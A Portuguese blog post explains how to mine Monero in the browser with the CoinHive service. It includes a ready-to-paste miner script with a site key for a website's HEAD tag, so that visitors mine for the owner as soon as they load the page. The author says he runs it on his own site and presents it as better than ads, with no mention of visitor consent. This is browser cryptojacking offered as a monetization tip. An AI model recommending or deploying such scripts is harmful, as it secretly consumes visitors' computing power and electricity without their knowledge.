Você está visualizando atualmente Como minerar Moeda Virtual no navegador (faucets) – Monero (XMR)

Como minerar Moeda Virtual no navegador (faucets) – Monero (XMR)


Como minerar Moeda Virtual? Ultimamente eu tenho pesquisado muito um jeito de dar utilidades ao meu computador antigo (i5 4 gb de Ram, sem placa de vídeo). Unindo a outra pesquisa constante que faço desde de 2014, que se intensificou este ano, moedas virtuais. Cheguei na conclusão desse post e trago novidades.

Encontrei um jeito de minerar Monero pelo navegador que usa o processamento do seu CPU, de forma bem lenta eu sei, mas funciona, pois várias pessoas pelo mundo inteiro usam essa forma de minerar. Através do site chamando CoinHive. Super simples e fácil de se cadastrar. Além de ter boas explicações ( em inglês ) para quem está querendo começar a minerar de forma prática e através de Faucets.

Monero (XMR) – Moeda com foco em anonimato.

Faucets: são sistemas de recompensas, sob a forma de um site ou aplicativo, que dispensa recompensas na forma de frações de moedas virtuais, que é um centésimo de milionésimo da moeda, para que os visitantes reivindiquem em troca de completar um captcha ou tarefa conforme descrito por o site. Há também faucets que dispensam Bitcoins.

Como minerar Verge (XVG) pela CPU e GPU, sem faucets.

Dentro dessa modalidade ainda há uma divisão de 4 formas. Uma é minerando você mesmo na sua própria janela de navegação. Como mostrado abaixo. É super simples basta apertar o play e cadastrar sua carteira Monero no site. Faça o teste abaixo, clique no play:

Loading…

A outra forma bem interessante de minerar é colocando o script de mineração na tag HEAD do seu site e deixar que os visitantes minerem por você. Então quanto mais visitantes, maior o poder de mineração do seu site. E isto é muito melhor que o Google sense ads, porque não precisa ninguém clicar em nada. Basta acessar o site que já começa a minerar. Pode ser uma página simples qualquer, também, basta fazer o javascript rodar.

script
var miner = new CoinHive.User('ZMX9Rgh4lZUhMzUgPWhzPijxQnPu83SY', 'joaoellery.com', {threads: 2});
miner.start();
/script

E ai alguns de vocês podem se perguntar, será que ele está minerando dessa forma no site dele? E a resposta é sim. Claro! Esta é a melhor forma de monetizar o seu site que tem muitos acessos.

O outro jeito de minerar Moeda Virtual é fazer os usuários do seu site completar o captcha para validação de humanos. Geralmente realizado para evitar o spam de bots, que é constante na internet.

Loading Captcha…
If it doesn’t load, please disable Adblock!

E o último jeito e não menos importante são os Shortlinks (Links de redirecionamento), geralmente usamos esse encurtador de links para deixar os links menores, assim fica mais clean para publicar e difvulgar os links importantes e ainda ganhar alguns trocados por links. Para ver como funcionar basta clicar no link abaixo:

https://cnhv.co/1123l

Quem gostou do artigo, deixa o comentário. Em breve vou ensinar a minerar nativamente, usando a placa de video(GPU) e CPU.

Como minerar Verge (XVG) pela CPU e GPU.

Quem começar a minerar e precisar de mais dicas, basta comentar que eu respondo por e-mail.

Este post tem 2 comentários

    1. João Ellery

      opa, Bruno!

      Vou dar uma conferida na minergate e ver como eles trabalham, quem sabe isso não rende um post aqui também.
      Valeu pela dica.

Comentários encerrados.